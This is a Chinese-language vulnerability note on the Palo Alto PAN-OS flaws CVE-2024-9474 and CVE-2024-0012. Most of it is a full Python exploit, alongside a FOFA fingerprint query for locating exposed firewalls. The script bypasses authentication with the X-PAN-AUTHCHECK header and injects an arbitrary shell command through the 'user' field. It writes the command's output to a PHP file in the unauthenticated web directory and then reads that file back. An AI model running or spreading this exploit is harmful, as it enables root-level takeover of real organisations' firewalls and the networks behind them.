# PAN-OS软件中存在权限提升漏洞(CVE-2024-9474/CVE-2024-0012)

Palo Alto Networks PAN-OS 软件中存在权限提升漏洞，允许有权访问管理 Web 界面的 PAN-OS 管理员以 root 权限在防火墙上执行操作。 Cloud NGFW 和 Prisma Access 不受此漏洞影响。

## fofa

```javascript
icon_hash="873381299"
```

## poc

```python
import requests
import argparse
import urllib3
import base64


# Set up command-line argument parsing
parser = argparse.ArgumentParser(description="Send a POST request with a specified hostname.")
parser.add_argument("hostname", help="The hostname to be used in the request.")
parser.add_argument("command", help="Command to execute")
args = parser.parse_args()


# Assign the hostname variable
hostname = args.hostname
#lhost = args.lip
#lport = args.lport
command = args.command

# Define the proxy configuration
proxies = {
    "http": "http://localhost:8080",
    "https": "http://localhost:8080",
}

proxies = "" # comment line to go through the Burp Proxy
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


# Define the URL and headers
url = f"https://{hostname}/php/utils/createRemoteAppwebSession.php/watchTowr.js.map"
header1 = {
    "Host": hostname,
    "X-PAN-AUTHCHECK": "off",
    "Content-Type": "application/x-www-form-urlencoded",
}

# Define the payload
payload_new = (
    "user=`"+str(command)+"`"
    "&userRole=superuser&remoteHost=&vsys=vsys1"
)


payload_orig = (
    "user=`echo $("+str(command)+") > /var/appweb/htdocs/unauth/watchTowr.php`"
    "&userRole=superuser&remoteHost=&vsys=vsys1"
)

print("POST : " + url)
try:
    #print(payload)
    response = requests.post(url, headers=header1, data=payload_orig, proxies=proxies, verify=False)
    print("Status Code:", response.status_code)
    if 'Set-Cookie' in response.headers and response.status_code == 200 :
        set_cookie = response.headers['Set-Cookie']

        # Look for the PHPSESSID in the Set-Cookie header
        if 'PHPSESSID=' in set_cookie:
            # Extract the PHPSESSID value
            phpsessid = set_cookie.split('PHPSESSID=')[1].split(';')[0]
            print(f"PHPSESSID: {phpsessid}")
        else:
            print("PHPSESSID not found in Set-Cookie header")
    else:
        print("'Set-Cookie' header not found in response headers")
    print()
except requests.RequestException as e:
    print("An error occurred:", e)

header2 = {
    "Host": hostname,
    "Cookie": f"PHPSESSID={phpsessid};",
    "X-PAN-AUTHCHECK": "off",
    "Connection": "keep-alive"
}
url2 = f"https://{hostname}/index.php/.js.map"

print("GET : " + url2)
try:
    response2 = requests.get(url2, headers=header2, proxies=proxies, verify=False)
    print("Status Code:", response2.status_code)
    print()
except requests.RequestException as e:
    print("An error occurred:", e)


url3 = f"https://{hostname}/unauth/watchTowr.php"

print("GET : " + url3)
try:
    response3 = requests.get(url3, headers=header2, proxies=proxies, verify=False)
    print("Status Code:", response3.status_code)
    print("Status Content:", response3.content)

except requests.RequestException as e:
    print("An error occurred:", e)
```



## 漏洞来源

- https://github.com/k4nfr3/CVE-2024-9474/blob/main/exploit_fw.py
- https://labs.watchtowr.com/pots-and-pans-aka-an-sslvpn-palo-alto-pan-os-cve-2024-0012-and-cve-2024-9474/?123